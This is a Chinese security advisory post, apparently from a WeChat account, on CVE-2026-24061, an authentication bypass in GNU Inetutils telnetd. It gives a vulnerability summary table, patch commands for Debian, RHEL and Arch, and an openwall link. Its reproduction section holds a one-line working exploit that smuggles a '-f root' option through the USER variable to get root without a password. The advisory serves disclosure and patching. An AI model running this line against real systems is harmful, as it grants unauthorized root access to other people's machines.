文章总结： 本文披露GNUInetutilstelnetd远程认证绕过高危漏洞CVE-2026-24061，CVSS评分9.8。攻击者利用USER=’-froot’telnet-aip可无需密码获取root权限。文章提供了复现方法及Debian、RHEL、Arch等系统的补丁升级方案，建议立即更新inetutils组件以修复风险。 综合评分： 78 文章分类： 漏洞预警,漏洞POC,漏洞分析

巨洞 CVE-2026-24061 Linux Telnetd 远程代码执行

表哥带我

2026年1月22日 11:42 广东

❝

由于传播、利用本公众号”表哥带我”所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文源自360、知攻善防、openwall等。

| | | | | | — | — | — | — | | 漏洞概述 | | | | | 漏洞名称 | GNU Inetutils telnetd 远程认证绕过漏洞 | | | | 漏洞编号 | CVE-2026-24061 | | | | 公开时间 | 2026-01-21 | POC状态 | 已公开 | | 漏洞类型 | 认证绕过 | EXP状态 | 已公开 | | 利用可能性 | 高 | 技术细节状态 | 已公开 | | CVSS 3.1 | 9.8 | 在野利用状态 | 未发现 |

复现

USER='-f root' telnet -a ip

防护方案

Debian/Ubuntu 系统：

sudo apt updatesudo apt upgrade inetutils-telnetd

RHEL/CentOS/Fedora 系统：

sudo dnf update inetutils 或sudo yum update inetutils

Arch Linux 系统：

sudo pacman -Syu inetutils

POC：

https://www.openwall.com/lists/oss-security/2026/01/20/2

其他阅读：

腾讯法务向数十个免费的微信聊天记录导出项目重拳出击

放心吧领导，我业绩最差了

记一次渗透拿下所谓黑客排行榜

【吃瓜】新年第一个“0day”

网络工程师被控涉嫌两项罪名，183个比特币被扣押

【吃瓜】前男友在某音给女生发约不约是挖漏洞

【吃瓜】黑客大王排行榜证书被认可

网安龙头奇安信发布2025年业绩预亏公告

【吃瓜】《逆战:未来》T0级事故，全服送神器

【吃瓜】携程接连发生向大量员工发离职短信

【吃瓜】神人之手机黑客的挖洞之路

左侧扫码加入

表哥带我

吃瓜交流群

动态入群二维码

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：表哥带我 《巨洞 CVE-2026-24061 Linux Telnetd 远程代码执行》